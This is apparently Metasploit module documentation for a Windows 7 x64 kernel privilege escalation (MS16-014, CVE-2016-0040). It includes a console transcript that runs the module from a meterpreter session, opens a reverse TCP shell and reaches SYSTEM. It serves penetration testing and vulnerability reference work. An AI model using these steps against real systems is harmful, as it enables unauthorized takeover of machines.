## Introduction

This module exploits an uninitialized stack variable vulnerability
present in the WMI subsystem  of `ntoskrnl`.  The vulnerability is
described by MS16-014 and CVE-2016-0040.  The module allows the user to
elevate privileges (NT AUTHORITY\SYSTEM)

This module works against Windows7x64 SP0 and SP1
It was tested on and fails against Windows 8x64 - Windows 10x64 r1703

## Verification Steps

- [ ] obtain a session on the target system
- [ ] set the `payload`
- [ ] set the `session`
- [ ] `run`

## Scenarios

### Windows 7x64 SP1

```
meterpreter > background
[*] Backgrounding session 0...
msf exploit(handler) > use exploits/windows/local/ms16_014_wmi_recv_notif
msf exploit(ms16_014_wmi_recv_notif) > set session 0
session => 0
msf exploit(ms16_014_wmi_recv_notif) > exploit

[*] Started reverse TCP handler on 172.16.38.170:4444
[*] Reflectively injecting the exploit DLL and running it...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (172.16.38.170:4444 -> 172.16.38.129:49695) at 2018-03-07 08:27:57 -0800

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\whoami
whoami
SYSTEM
```
